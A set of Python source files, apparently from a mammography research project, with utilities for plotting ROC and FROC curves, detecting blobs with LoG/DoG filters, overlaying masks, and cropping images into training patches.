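def _demo_find_threshold():
    fpr = [0.0, 0.25, 0.5, 1.0]
    tpr = [0.0, 0.6, 0.8, 1.0]
    thresholds = [1.0, 0.7, 0.4, 0.1]
    target_thr, target_tpr = find_threshold(fpr, tpr, thresholds, target_fpr=0.375)
    return target_thr, target_tpr  # approximately (0.55, 0.7)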
def plot_crosshair(coordinates, ax=None, **kwargs):
"""
    Plot crosshair at target coordinate
Args:
coordinates: the x, y coordinates of the point to be plotted
Return:
crosshair_handles: handles to crosshair lines
"""
x, y = coordinates
if ax is None:
ax = plt.gca()
horiz = ax.axhline(y, **kwargs)
vert = ax.axvline(x, **kwargs)
annotation = '({:.2f},{:.2f})'.format(x, y)
plt.annotate(annotation, (x + 0.01, y - 0.04), color=kwargs['color'])
crosshair_handles = horiz, vert
return crosshair_handles
def plot_inset(fig, auc_list, title='auc', xlabel='ckpt', location=[0.55, 0.25, 0.3, 0.3]):
left, bottom, width, height = location
ax1 = fig.add_axes([left, bottom, width, height])
ax1.plot(auc_list, color='k', marker='o')
plt.xlabel(xlabel)
plt.title(title)
def plot_roc_from_txt(fig, filename, idx=0, target_fpr=0.5, show_crosshair=True, plot_type='plot', title=''):
""" Plot ROC curve from a text file
Args:
filename: Each line of the text file contains a prediction in [0, 1] and a label, separated by comma
idx: optional, index number of the current curve
Return:
auc: Area under ROC curve
"""
# get predictions and labels lists
preds = []
labels = []
image_ids = []
with open(filename, 'r') as infile:
for line in infile:
items = [item.strip() for item in line.split(',')]
pred, label = items[0], items[1]
preds.append(float(pred))
labels.append(int(label))
preds = np.array(preds)
labels = np.array(labels)
num_neg_label = (labels == 0).sum()
# plot/add to ROC curve
fpr, tpr, thresholds = metrics.roc_curve(labels, preds, drop_intermediate=False)
target_thr, target_tpr = find_threshold(fpr, tpr, thresholds, target_fpr)
auc = metrics.auc(fpr, tpr)
data_label = '{}. {}: {:.3f}'.format(idx, os.path.basename(filename), auc)
plt.figure(fig.number)
plt.plot([0, 1], [0, 1], color='gray', lw=1, linestyle='--')
xs = fpr
if plot_type == 'plot':
plt.plot(xs, tpr, label=data_label)
elif plot_type == 'scatter':
plt.scatter(xs, tpr, s=80, facecolors='none', edgecolors='b', marker='o', label=data_label)
# plt.tight_layout()
plt.xlim([0, 1.0])
plt.ylim([0, 1.0])
plt.grid(linestyle=':')
lgd = plt.legend(loc='center left', fontsize=12, bbox_to_anchor=(1, 0.5))
plt.xlabel('FPR', fontsize=12)
plt.ylabel('TPR (Recall)', fontsize=12)
plt.title(title, fontsize=18)
if show_crosshair:
coordinates = (target_fpr, target_tpr)
plot_crosshair(coordinates, color='red', lw=1, linestyle='--')
disp_fpr = [0.01, 0.03, 0.05, 0.07, 0.1, 0.2, 0.3, 0.4, 0.5]
disp_thr = [0.0] * len(disp_fpr)
disp_tpr = [0.0] * len(disp_fpr)
annotation = '({:4},{:4},{:4})'.format('FPR', 'TPR', 'Thr')
x, y = coordinates
# Move annotation to top if curve is too low
if y < 0.5:
y = 1.0
plt.annotate(annotation, (x + 0.01, y - 0.12))
for i in range(len(disp_fpr)):
disp_thr[i], disp_tpr[i] = find_threshold(fpr, tpr, thresholds, disp_fpr[i])
print("FPR={}, TPR={:.4f} at threshold={:.4f}".format(disp_fpr[i], disp_tpr[i], disp_thr[i]))
annotation = '({:.2f},{:.2f},{:.3f})'.format(disp_fpr[i], disp_tpr[i], disp_thr[i])
plt.annotate(annotation, (x + 0.01, y - 0.12 - 0.04*(1+i)))
return auc, lgd
def split_with_square_brackets(input_str):
"""
Split a string using "," as delimiter while maintaining continuity within "[" and "]"
Args:
input_str: Input string
Returns:
substrings: List of substrings
"""
substrings = []
bracket_level = 0
current_substr = []
for next_char in (input_str + ","):
if next_char == "," and bracket_level == 0:
substrings.append("".join(current_substr))
current_substr = []
else:
if next_char == "[":
bracket_level += 1
elif next_char == "]":
bracket_level -= 1
current_substr.append(next_char)
return substrings
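# Hedged usage sketch (added for illustration, not from the original code): the
# brackets keep the matched-label list together even though it contains commas,
# which is how the FROC parser below consumes each line. The line is made up.
def _demo_split_with_square_brackets():
    line = '0.93,[2, 5],img_00017'
    return split_with_square_brackets(line)  # ['0.93', '[2, 5]', 'img_00017']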
def update_preds_and_labels(pred, labels_matched, image_id, detected_labels, preds, labels, image_ids):
"""
Convert the matched labels of the prediction bbox to binary label and update all predictions and labels
Args:
pred: Current prediction score
labels_matched: GT labels for which the current prediction is a match
image_id: Current image ID
detected_labels: GT labels that have been detected so far for this image_id
preds: List of all predictions, passed by reference
labels: List of all binary labels, passed by reference
image_ids: List of all image IDs, passed by reference
Returns:
detected_labels: GT labels that have been detected so far for this image_id
"""
num_detected_so_far = len(detected_labels)
detected_labels = detected_labels.union(set(labels_matched))
    # If the current prediction contributes to a new match, set label to 1
if len(detected_labels) > num_detected_so_far:
label = 1
for _ in range(len(detected_labels) - num_detected_so_far):
preds.append(float(pred))
labels.append(float(label))
image_ids.append(image_id)
else:
label = 0
preds.append(float(pred))
labels.append(float(label))
image_ids.append(image_id)
return detected_labels
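# Hedged worked example (added for illustration, not from the original code): the
# first prediction matching GT lesion 3 on an image counts as a new detection
# (label 1); a later, lower-scoring match on the same lesion adds nothing new and
# is labelled 0. The image id is made up.
def _demo_update_preds_and_labels():
    preds, labels, image_ids = [], [], []
    detected = set()
    detected = update_preds_and_labels(0.9, [3], 'img_001', detected, preds, labels, image_ids)
    detected = update_preds_and_labels(0.8, [3], 'img_001', detected, preds, labels, image_ids)
    return preds, labels  # ([0.9, 0.8], [1.0, 0.0])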
def plot_froc_from_txt(fig, filename, idx=0, target_fpr=0.5, show_crosshair=True, plot_type='plot', title=''):
""" Plot FROC curve from a text file
Args:
filename: Each line of the text file contains a prediction in [0, 1] and a label, separated by comma
idx: optional, index number of the current curve
Return:
auc: Area under ROC curve
"""
# get predictions and labels lists
preds = []
labels = []
image_ids = []
with open(filename, 'r') as infile:
for line in infile:
# items = [item.strip() for item in line.split(',')]
items = [item.strip() for item in split_with_square_brackets(line)]
pred, labels_matched = items[0], items[1]
labels_matched = ast.literal_eval(labels_matched)
try:
image_id = items[2]
except:
raise ValueError('Every line must have image_id for FROC curve generation!')
if float(pred) == 0 and len(labels_matched) == 0:
continue
if image_id not in image_ids:
detected_labels = set()
detected_labels = update_preds_and_labels(pred, labels_matched, image_id, detected_labels, \
preds, labels, image_ids)
preds = np.array(preds)
labels = np.array(labels)
num_unique_image_ids = len(set(image_ids))
num_neg_label = (labels == 0).sum()
# plot/add to ROC curve
fpr, tpr, thresholds = metrics.roc_curve(labels, preds)
fpr, tpr, thresholds = fpr[:-1], tpr[:-1], thresholds[:-1]
# this is equivalent to [(labels[preds > threshold] == 0).sum() / num_image_ids for threshold in thresholds]
neg_per_image = num_neg_label / num_unique_image_ids
fpc = fpr * neg_per_image
# print 'fpr, tpr, thresholds:
target_thr, target_tpr = find_threshold(fpr, tpr, thresholds, target_fpr)
auc = metrics.auc(fpr, tpr)
data_label = '{}. {}: {:.3f}'.format(idx, os.path.basename(filename), auc)
plt.figure(fig.number)
xs = fpc
if plot_type == 'plot':
plt.plot(xs, tpr, label=data_label)
elif plot_type == 'scatter':
plt.scatter(xs, tpr, s=80, facecolors='none', edgecolors='b', marker='o', label=data_label)
plt.tight_layout()
plt.xlim([0, 10.0])
plt.ylim([0, 1.0])
plt.grid(linestyle=':')
lgd = plt.legend(loc='center left', fontsize=12, bbox_to_anchor=(1, 0.5))
plt.xlabel('FP per Image', fontsize=12)
plt.ylabel('TPR (Recall)', fontsize=12)
plt.title(title, fontsize=18)
if show_crosshair:
coordinates = (target_fpr * neg_per_image, target_tpr)
plot_crosshair(coordinates, color='red', lw=1, linestyle='--')
disp_fpr = [0.001, 0.003, 0.005, 0.007, 0.01, 0.02, 0.03, 0.04]
disp_thr = [0.0] * len(disp_fpr)
disp_tpr = [0.0] * len(disp_fpr)
annotation = '({:4},{:4},{:4})'.format('FPPI', 'TPR', 'Thr')
x, y = coordinates
plt.annotate(annotation, (x + 0.01, y - 0.12))
for i in range(len(disp_fpr)):
disp_thr[i], disp_tpr[i] = find_threshold(fpr, tpr, thresholds, disp_fpr[i])
annotation = '({:.2f},{:.2f},{:.2f})'.format(disp_fpr[i] * neg_per_image, disp_tpr[i], disp_thr[i])
plt.annotate(annotation, (x + 0.01, y - 0.12 - 0.04*(1+i)))
return auc, lgd
def plot_froc_from_data_dict(data_dict, output_fig_path=None, fig_title=None,
label_filter='', xlim=(0.1, 50), key_sorter=None, plot_recall=False,
highlight_idx=None, **kwargs):
"""Plot froc curve from a data dict
Args:
data_dict: a dict of dict. Each sub-dict has keys
label: used as legend
data: list of list in the format [[recall, fpc, threshold], ...]
output_fig_path:
fig_title:
label_filter:
xlim:
key_sorter: a function to sort the keys. Default to sorting by last mod time
plot_recall: defaults to False, where a semilogx and a linear plot are plotted side by side.
            When plot_recall is True, replace the linear plot with a plot of recall in chronological order
highlight_idx: the idx (counting from 0) of the threshold list to plot trend over time
Returns:
None
"""
fig = plt.figure(figsize=(12, 6))
labels = sorted(set(val['label'] for val in data_dict.values()))
line_styles = ['-', ':', '-.', '--']
if len(labels) > len(line_styles) or len(data_dict) == len(labels):
ls_dict = {label:line_styles[0] for idx, label in enumerate(labels)}
else:
ls_dict = {label:line_styles[idx] for idx, label in enumerate(labels)}
if plot_recall:
plot_fns = [plt.semilogx]
else:
plot_fns = [plt.semilogx, plt.plot]
for idx, plot_func in enumerate(plot_fns):
plt.subplot(1, 2, idx+1)
keys = sorted(data_dict.keys())
# sort by last mod time
key_sorter = key_sorter or (lambda x: os.path.getmtime(x))
try:
keys.sort(key=key_sorter)
except:
# if cannot sort with key_sorter, sort alphabetically by key string
keys.sort(key=str)
mid_recall_list = []
mid_fp_list = []
for key in keys:
label = data_dict[key]['label']
line_style = ls_dict[label]
if 'num_images' in data_dict[key]:
label = '{} (count:{})'.format(label, data_dict[key]['num_images'])
if label_filter in label:
data = data_dict[key]['data']
fpc = [item[1] for item in data]
recall = [item[0] for item in data]
p = plot_func(fpc, recall, marker='.', ls=line_style, label=label)
color = p[0].get_color()
if highlight_idx is not None:
if highlight_idx == 'mid':
highlight_idx = (len(fpc) - 1) // 2
mid_recall_list.append(recall[highlight_idx])
mid_fp_list.append(fpc[highlight_idx])
plt.scatter(fpc[highlight_idx], recall[highlight_idx],
marker='o', s=100, facecolors='none', edgecolors=color)
plt.xlabel('FP per Image')
plt.ylabel('Recall')
plt.title(fig_title)
plt.xlim(xlim)
plt.ylim([0, 1])
plt.grid()
plt.yticks([i / 10.0 for i in range(0, 10)])
plt.grid(b=True, which='major', color='gray', linestyle='-')
plt.grid(b=True, which='minor', color='gray', linestyle='--')
# only plot the legend of the last subplot
plt.legend(loc='best', fancybox=True, framealpha=0.5)
if plot_recall:
# plot on the RHS
ax1 = plt.subplot(122)
ax2 = ax1.twinx()
plot_sharex_series(ax1, ax2, mid_recall_list, mid_fp_list, ylim1=(0, 1), ylim2=(0.1, 10),
xlabel='ckpt', ylabels=('Recall', 'FPC'))
plt.grid()
plt.title('Recall and FPC')
if output_fig_path is not None:
fileio.maybe_make_new_dir(os.path.dirname(output_fig_path))
plt.savefig(output_fig_path, dpi=300) # default dpi is usually 100
plt.close('all')
else:
plt.show()
return fig
def plot_sharex_series(ax1, ax2, data1, data2, t=None, ylim1=None, ylim2=None,
xlabel='', ylabels=('', ''), colors=('tab:red', 'tab:blue')):
""""Plot two data series of different scales on the same graph
Adapted from https://matplotlib.org/gallery/api/two_scales.html
"""
color1, color2 = colors
ylabel1, ylabel2 = ylabels
if not t:
t = range(1, len(data1) + 1)
# plot first series
color = color1
ax1.set_xlabel(xlabel)
ax1.set_ylabel(ylabel1, color=color)
ax1.plot(t, data1, color=color, ls='--', marker='o', markersize=10, markerfacecolor='none')
ax1.tick_params(axis='y', labelcolor=color)
ax1.set_yticks([i / 10.0 for i in range(0, 10)])
ax1.yaxis.grid(color=color, linestyle='--')
ax1.xaxis.grid(color='gray', linestyle='--')
if ylim1:
ax1.set_ylim(ylim1)
# plot second series
color = color2
ax2.set_ylabel(ylabel2, color=color) # we already handled the x-label with ax1
ax2.semilogy(t, data2, color=color, linestyle='--', marker='o', markersize=10, markerfacecolor='none')
ax2.tick_params(axis='y', labelcolor=color)
if ylim2:
ax2.set_ylim(ylim2)
ax2.yaxis.grid(color='black', linestyle='--') # <FIXME> this does not show up. Why?
plt.tight_layout() # otherwise the right y-label is slightly clipped
def batch_plot_froc_json(input_search_path, output_fig_path=None, name='', legend_regex_sub='', **kwargs):
"""Plot json in a directory onto one froc
Args:
input_search_path: glob pattern, such as '/data/log/mammo/calc_train/Mammo_20180318-22h44PM39/froc*json', so
it could be a path to a specific file. It could also be a list of glob patterns, but they should have
the same parent (FROC title uses the parent folder of the first pattern).
output_fig_path:
name: FROC dataset patterns in title
legend_regex_sub: regex pattern to delete from legend labels
Returns:
None
"""
if not isinstance(input_search_path, (list, tuple)):
input_search_path = [input_search_path]
froc_json_path_list = []
for single_search_path in input_search_path:
froc_json_path_list.extend(glob2.glob(single_search_path))
froc_json_path_list = sorted(set(froc_json_path_list))
# generate fig title
input_dir = os.path.dirname(input_search_path[0])
json_dirname = os.path.basename(input_dir.strip(os.sep)) # the last level of folder name
fig_title = '{} FROC {}'.format(name, json_dirname)
data_dict = {}
for froc_json_path in froc_json_path_list:
with open(froc_json_path, 'r') as f_in:
data_dict[froc_json_path] = {}
label = os.path.basename(froc_json_path).replace('.json', '')#.replace(legend_str_omit, '')
label = re.sub(legend_regex_sub, '', label)
data_dict[froc_json_path]['label'] = label
data_dict[froc_json_path]['data'] = json.load(f_in)
plot_froc_from_data_dict(data_dict, output_fig_path, fig_title, **kwargs)
<file_sep>"""
Blob detection with DoG (Difference of Gaussian) and LoG (Laplacian of Gaussian)
"""
from skimage import feature, filters
from skimage.transform import resize
from skimage import morphology
import pandas as pd
import re
import numpy as np
import glob
import glob2
import matplotlib.pylab as plt
import cv2
import os
import dicom
from projects.drutils import data
from projects.drutils import parser
from projects.drutils import fileio
from projects.mammo_seg import inbreast
def calc_dog(img, sigma, k=1.6):
"""Calculate difference of gaussian
Args:
img:
sigma:
k:
Returns:
"""
s1 = filters.gaussian(img, k * sigma)
s2 = filters.gaussian(img, sigma)
dog = s1 - s2
return dog
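# Hedged usage sketch (added for illustration, not from the original code): with the
# subtraction order used above (wide blur minus narrow blur), a bright blob shows up
# as a negative peak in the DoG response, as a synthetic single-pixel blob shows.
def _demo_calc_dog():
    img = np.zeros((64, 64), dtype=np.float64)
    img[32, 32] = 1.0
    dog = calc_dog(img, sigma=2.0)
    return dog.shape, dog[32, 32] < 0  # (64, 64), True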
def get_binary_mask(img, disk_size, option='erode'):
"""Get a binary mask based for input image
Args:
img:
disk_size:
option: currently supported option
'erode'
Returns:
binary_mask:
"""
if disk_size > 0:
th = filters.threshold_otsu(img)
binary_mask = (img > th)
selem = morphology.disk(disk_size)
if option == 'erode':
binary_mask = morphology.binary_erosion(binary_mask, selem=selem)
elif option == 'open':
binary_mask = morphology.binary_opening(binary_mask, selem=selem)
else:
raise ValueError('Unsupported option {}'.format(option))
else:
binary_mask = None
return binary_mask
class LogBlobDetector(object):
"""Blob detector using LoG (Laplacian of Gaussian)"""
def __init__(self, img, disk_size=10, **kwargs):
"""Constructor
Args:
img:
**kwargs: example kwargs include
max_sigma=25, min_sigma=2, num_sigma=3, threshold=0.1
"""
self.img = img
self.disk_size = disk_size
self.max_sigma = kwargs['max_sigma']
self.min_sigma = kwargs['min_sigma']
self.num_sigma = kwargs['num_sigma']
self.threshold = kwargs['threshold']
def detect(self):
"""Detect blobs in image
Returns:
blobs_log_filtered: a list of tuples (x, y, r) that lies within the mask
"""
blobs_log = feature.blob_log(self.img,
max_sigma=self.max_sigma,
min_sigma=self.min_sigma,
num_sigma=self.num_sigma,
threshold=self.threshold)
binary_mask = get_binary_mask(self.img, self.disk_size, option='erode')
if binary_mask is not None:
blobs_log_filtered = []
for blob in blobs_log:
y, x, r = blob
if binary_mask[int(y), int(x)]:
blobs_log_filtered.append((y, x, r))
else:
blobs_log_filtered = blobs_log
return blobs_log_filtered
def detector_batch_deploy(LogBlobDetector, inbreast_name_list):
"""Batch deploy blob detector
Args:
LogBlobDetector:
inbreast_name_list:
Returns:
"""
inbreast_dict = inbreast.generate_inbreast_dict()
for name in inbreast_name_list:
print(name)
# get paths
try:
mask_path = \
list(glob.glob(os.path.join(inbreast_dict['basedir'], 'AllMASK_level2', '_combined', '{}*'.format(name))))[0]
image_path = list(glob.glob(os.path.join(inbreast_dict['basedir'], 'AllPNG', '{}*'.format(name))))[0]
stack_path = list(glob.glob(os.path.join(inbreast_dict['basedir'], 'stack', '{}*'.format(name))))[0]
except:
print('not found {}'.format(name))
continue
# read images
img = plt.imread(image_path, -1)
img_shape = img.shape
img_mask = plt.imread(mask_path, -1)
img_stack = plt.imread(stack_path, -1)
img_overlay = (img_stack[:, img_stack.shape[1] // 2:])
# get eroded binary mask
det = LogBlobDetector(img, max_sigma=25, min_sigma=2, num_sigma=3, threshold=0.1, disk_size=50)
blobs_log = det.detect()
canvas = img_overlay.copy()
for y, x, r in blobs_log:
cv2.circle(canvas, (int(x), int(y)), int(r + 5), color=(102, 255, 0), thickness=2)
# stack image side-by-side for comparison
img_log = np.hstack([canvas, np.dstack([img] * 3)])
plt.imsave(os.path.join(inbreast_dict['basedir'], 'log', '{}_log_th0.1.png'.format(name)), img_log)
if __name__ == "__main__":
inbreast_dict = inbreast.generate_inbreast_dict()
df = pd.read_csv(inbreast_dict['csv_path'])
# loop over all files and save to file
# name_list = df[~ (df['Findings'].str.contains('normal'))]['File Name'][:1]
name_list = df['File Name'].tolist()[:2]
print(name_list)
detector_batch_deploy(LogBlobDetector, name_list)
<file_sep>import random
import colorsys
import numpy as np
def random_colors(N, bright=True):
"""
Generate random colors.
To get visually distinct colors, generate them in HSV space then
convert to RGB.
"""
brightness = 1.0 if bright else 0.7
hsv = [(i / N, 1, brightness) for i in range(N)]
colors = list(map(lambda c: colorsys.hsv_to_rgb(*c), hsv))
random.shuffle(colors)
return colors
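# Hedged usage sketch (added for illustration, not from the original code): each
# entry is an RGB tuple with components in [0, 1], evenly spaced in hue so that
# neighbouring instances stay visually distinct.
def _demo_random_colors():
    colors = random_colors(5)
    assert len(colors) == 5
    assert all(0.0 <= c <= 1.0 for rgb in colors for c in rgb)
    return colors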
def overlay_mask(image, mask, color=(0, 255, 0), alpha=1):
"""Overlay 2d mask on rgb image with color and transparency
Args:
image:
mask:
color:
alpha:
Returns:
"""
assert len(mask.shape) == 2
assert len(image.shape) == 3
assert mask.shape == image.shape[:2]
    canvas_opaque = np.where(np.expand_dims(mask, axis=2),
                             np.array(color).astype(np.uint8).reshape([1, 1, 3]), image)
    canvas = (canvas_opaque * alpha + image * (1 - alpha)).astype(np.uint8)
return canvas<file_sep>"""Utility classes and functions to crop images to patches"""
import glob
import glob2
import json
import logging
from datetime import datetime
import cv2
import numpy as np
import os
import shutil
import tensorflow as tf
from sklearn.model_selection import train_test_split
from tqdm import tqdm
os.sys.path.append('/data1/MedicalImage/User/xing/SigmaPy')
from projects.drutils import fileio
from projects.drutils import augmentation
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')
class PairedDictGenerator(object):
def __init__(self, image_search_path, mask_search_path, output_dir,
image_suffix=".tif", mask_suffix='_mask.tif'):
self.output_dir = output_dir
self.image_files = self._find_data_files(image_search_path, image_suffix)
self.mask_files = self._find_data_files(mask_search_path, mask_suffix)
def get_paired_image_and_mask(self, join='inner', key_names=('image', 'mask')):
"""Create paired image and mask files
Find common files in two folders and create dictionary paired_dict. Each key has two keys:
'image': path to the image file
'mask': path to the mask file
Args:
join: {'inner', 'outer', 'left', 'right'}
'inner': find intersection between two lists
'outer': find union of two lists
'left': first list (image list)
'right': second list (mask list)
Returns:
paired_dict: paired_dict[key]['image'] and paired_dict[key]['mask'] is a file
"""
image_key, mask_key = key_names
self.image_dict = {self.get_image_key_fn(filepath):filepath for filepath in self.image_files}
self.mask_dict = {self.get_mask_key_fn(filepath): filepath for filepath in self.mask_files}
if join == 'inner':
keys = set(self.image_dict.keys()) & set(self.mask_dict.keys())
elif join == 'outer':
keys = set(self.image_dict.keys()) | set(self.mask_dict.keys())
elif join == 'left':
keys = set(self.image_dict.keys())
elif join == 'right':
keys = set(self.mask_dict.keys())
else:
raise KeyError('Unsupported join method {}'.format(join))
paired_dict = {}
for key in keys:
paired_dict[key] = {}
paired_dict[key][image_key] = self.image_dict.get(key, '')
paired_dict[key][mask_key] = self.mask_dict.get(key, '')
logging.debug('paired_dict with length {}'.format(len(paired_dict)))
filepath = os.path.join(self.output_dir, 'paired_dict.json')
fileio.maybe_make_new_dir(os.path.dirname(filepath))
with open(filepath, 'w') as f_out:
json.dump(paired_dict, f_out, indent=4, sort_keys=True)
return paired_dict
@staticmethod
def _find_data_files(search_path, suffix):
all_files = glob2.glob(search_path)
return [name for name in all_files if suffix in name]
@staticmethod
def get_image_key_fn(filepath):
"""Get key for paired_dict
Example:
'/media/Data/Data02/Datasets/Mammogram/INbreast/mass_mask/22678646_combined.png'
--> 22678646
Args:
filepath:
Returns:
A string as key in paired_dict
"""
# FIXME: use a generalized method to get key for different dataset
if 'DDSM' in filepath:
return os.path.basename(filepath).split('.')[0]
return os.path.basename(filepath).split('.')[0].split('_')[0]
@staticmethod
def get_mask_key_fn(filepath):
"""Get key for paired_dict
Example:
'/media/Data/Data02/Datasets/Mammogram/INbreast/AllPNG/53586805_e5f3f68b9ce31228_MG_R_CC_ANON.dcm.png'
--> 53586805
Args:
filepath:
Returns:
A string as key in paired_dict
"""
# FIXME: use a generalized method to get key for different dataset
if 'DDSM' in filepath:
return ('_').join(os.path.basename(filepath).split('.')[0].split('_')[:-2])
return os.path.basename(filepath).split('.')[0].split('_')[0]
class VectorizedPairedDictGenerator(PairedDictGenerator):
"""Extended PairedDictGenerator
Each of image_search_path and mask_search_path can be a list of glob search patterns
Below is the doctest:
>>> from pathlib import Path
>>> import os
>>> import shutil
>>> test_path = r'/tmp/test/'
>>> for name in ['1', '2', '3']:
... for folder in ['images', 'mask1', 'mask2']:
... filename = os.path.join(test_path, folder, name + '.png')
... os.makedirs(os.path.dirname(filename), exist_ok=True)
... Path(filename).touch()
>>> image_search_path = os.path.join(test_path, 'images', '*png')
>>> mask_search_path = [os.path.join(test_path, 'mask1', '*png'), os.path.join(test_path, 'mask2', '*png')]
>>> output_dir = test_path
>>> image_suffix=".png"
>>> mask_suffix='.png'
>>> dict = VectorizedPairedDictGenerator(
... image_search_path, mask_search_path,
... output_dir, image_suffix, mask_suffix).get_paired_image_and_mask()
>>> shutil.rmtree(test_path)
"""
def __init__(self, image_search_path, mask_search_path, output_dir,
image_suffix=".tif", mask_suffix='_mask.tif'):
self.output_dir = output_dir
self.image_files = self._find_data_files(image_search_path, image_suffix)
self.mask_files = self._find_data_files(mask_search_path, mask_suffix)
self.is_vector = (
(isinstance(image_search_path, (list, tuple)) and len(image_search_path) > 1)
or (isinstance(mask_search_path, (list, tuple)) and len(mask_search_path) > 1)
)
@staticmethod
def _find_data_files(search_path_list, suffix):
if not isinstance(search_path_list, (list, tuple)):
search_path_list = [search_path_list]
image_files_list = []
for single_image_search_path in search_path_list:
tmp_image_files = PairedDictGenerator._find_data_files(single_image_search_path, suffix)
image_files_list.append(tmp_image_files) # list of list
assert len(set(len(image_files) for image_files in image_files_list)) <= 1, \
'Different folders have different number of files for list {}'.format(search_path_list)
# flatten list of list
image_files = [item for image_files in image_files_list for item in image_files]
return image_files
def get_paired_image_and_mask(self, join='inner'):
"""Create paired image and mask files
Find common files in two folders and create dictionary paired_dict. Each key has two keys:
'image': path to the image file
'mask': path to the mask file
Args:
join: {'inner', 'outer', 'left', 'right'}
'inner': find intersection between two lists
'outer': find union of two lists
'left': first list (image list)
'right': second list (mask list)
Returns:
paired_dict: paired_dict[key]['image'] and paired_dict[key]['mask'] is a list
"""
# each key in image_dict and mask_dict corresponds to a list
if not self.is_vector:
self.image_dict = {self.get_image_key_fn(filepath): filepath for filepath in self.image_files}
self.mask_dict = {self.get_mask_key_fn(filepath): filepath for filepath in self.mask_files}
else:
self.image_dict = {}
for filepath in self.image_files:
key = self.get_image_key_fn(filepath)
if key not in self.image_dict:
self.image_dict[key] = []
self.image_dict[key].append(filepath)
self.mask_dict = {}
for filepath in self.mask_files:
key = self.get_mask_key_fn(filepath)
if key not in self.mask_dict:
self.mask_dict[key] = []
self.mask_dict[key].append(filepath)
if join == 'inner':
keys = set(self.image_dict.keys()) & set(self.mask_dict.keys())
elif join == 'outer':
keys = set(self.image_dict.keys()) | set(self.mask_dict.keys())
elif join == 'left':
keys = set(self.image_dict.keys())
elif join == 'right':
keys = set(self.mask_dict.keys())
else:
raise KeyError('Unsupported join method {}'.format(join))
if self.is_vector:
empty_val = []
else:
empty_val = ''
paired_dict = {}
for key in keys:
paired_dict[key] = {}
paired_dict[key]['image'] = self.image_dict.get(key, empty_val)
paired_dict[key]['mask'] = self.mask_dict.get(key, empty_val)
logging.debug('paired_dict with length {}'.format(len(paired_dict)))
filepath = os.path.join(self.output_dir, 'paired_dict.json')
fileio.maybe_make_new_dir(os.path.dirname(filepath))
with open(filepath, 'w') as f_out:
json.dump(paired_dict, f_out, indent=4, sort_keys=True)
return paired_dict
class PatchConverter(PairedDictGenerator):
"""Convert images to patches in the same folder
Note: All coordinates are in (y, x) or (h, w) order.
Args:
image_search_path: a glob search pattern to find all images and labels
mask_search_path:
output_dir:
block_size: patch size. If (-1, -1), return the whole image
overlap:
image_suffix:
mask_suffix:
remove_zero_threshold: applied to LABEL patch. The number of non-zero pixels
below which to discard the label patch. If -1 do not discard any label patch.
remove_fg_threshold: applied to IMAGE patch. Default to 0.5. Discard patches
if 50% of image patch is background
"""
def __init__(self, image_search_path, mask_search_path, output_dir,
block_size=(100, 100), overlap=(0, 0),
image_suffix=".tif", mask_suffix='_mask.tif',
remove_zero_threshold=-1, ignore_padding=0, remove_fg_threshold=0.5, scale=1.0):
super(PatchConverter, self).__init__(image_search_path, mask_search_path, output_dir,
image_suffix=image_suffix, mask_suffix=mask_suffix)
# NB. update block_size, overlap, central_size and padding_size together
self.block_size = block_size
self.overlap = overlap
self.central_size = np.array(self.block_size) - np.array(self.overlap)
assert all(item % 2 == 0 for item in self.overlap), 'overlap must be even integers!'
# padding_size used to compensate for prediction center cropping
self.padding_size = (overlap[0] // 2, overlap[1] // 2)
# Temp folder to store cropped patches. Use timestamp to avoid racing condition
time_now = datetime.now()
time_string = time_now.strftime("%Y%m%d-%Hh%M%p%S")
self.prediction_patch_dir = '/tmp/tmp_patches_' + time_string
self.remove_zero_threshold = remove_zero_threshold
self.ignore_padding = ignore_padding
fileio.maybe_make_new_dir(self.output_dir)
self.remove_fg_threshold = remove_fg_threshold
self.scale = scale
def crop_patches(self, image_array, top_left=(0, 0), padding='zero'):
"""
Args:
image_array: a numpy array containing the image
top_left: a tuple containing the (y, x) coordinate of the patch
the patch will have shape (h, w) = self.block_size
padding: if patch is partially outside of image, use padding
'zero': padding with zero
'mirror': mirror padding
Returns: a numpy array of the patch cropped from image_array
"""
height, width = image_array.shape
y, x = top_left
h_patch, w_patch = self.block_size
# TODO: move padding to self._preprocess_image()
y_padding, x_padding = self.padding_size
image_array_padded = np.zeros((height + 2 * y_padding, width + 2 * x_padding))
image_array_padded[y_padding:(y_padding + height), x_padding:(x_padding + width)] = image_array
y += y_padding
x += x_padding
patch_array = image_array_padded[y:(y + h_patch), x:(x + w_patch)]
# pad patch_array to block_size if patch array is partial
patch_array = augmentation.crop_or_pad(patch_array, self.block_size)
assert patch_array.shape == tuple(self.block_size), 'patch_array shape {}'.format(patch_array.shape)
return patch_array
def generate_top_left_list(self, image_shape, method='valid'):
"""Generate a list of coordinates of the top left corner point
Args:
image_shape:
method: can be 'valid' or 'padding'
'valid': adjust end block so that it does not extend beyond valid image
'padding': pad partial patches with zeroes
Note: patches are always cropped from the padded image; during training some
patches may later be discarded, while during prediction the grid covers the
whole image so the full-size mask can be reassembled.
Returns:
top_left_list: a list of (y, x) tuples
"""
height, width = image_shape
h_block, w_block = self.block_size
h_overlap, w_overlap = self.overlap
h_padding, w_padding = self.padding_size
# generate block increments
dy = h_block - h_overlap
dx = w_block - w_overlap
assert dy > 0 and dx > 0, "overlap larger than block size!"
# crop from padded image
# from (-h_padding, -w_padding) to (height + h_padding, width + w_padding)
y_list = list(range(-h_padding, height + h_padding - h_overlap, dy))
x_list = list(range(-w_padding, width + w_padding - w_overlap, dx))
logging.debug('x_list before adjustment: {}'.format(x_list))
logging.debug('y_list before adjustment: {}'.format(y_list))
if method == 'valid':
y_list[-1] = height + h_padding - h_block
x_list[-1] = width + w_padding - w_block
elif method == 'padding':
# padding implemented in self.crop_patches()
pass
top_left_list = [(y, x) for y in y_list for x in x_list]
logging.debug('image total size {} x {}'.format(height, width))
logging.debug('x_list: {}'.format(x_list))
logging.debug('y_list: {}'.format(y_list))
return top_left_list
@staticmethod
def _get_patch_name(key, idx, name='', is_mask=False, output_dir=None):
if not is_mask:
file_name = '{}_{:03d}{}.png'.format(key, idx, name)
else:
file_name = '{}_{:03d}{}_mask.png'.format(key, idx, name)
file_path = os.path.join(output_dir, file_name)
return file_path
def save_patch_to_file(self, image_array, key, idx, name='', is_mask=False, output_dir=None):
"""Save image patches to self.output_dir
Args:
image_array:
key:
idx: the index number of patches corresponding to the same key
is_mask: boolean to indicate if the patch is image or mask
Returns:
None
"""
output_dir = output_dir or self.output_dir # if output_dir is None, use self.output_dir
file_path = self._get_patch_name(key, idx, name=name, is_mask=is_mask, output_dir=output_dir)
cv2.imwrite(file_path, image_array)
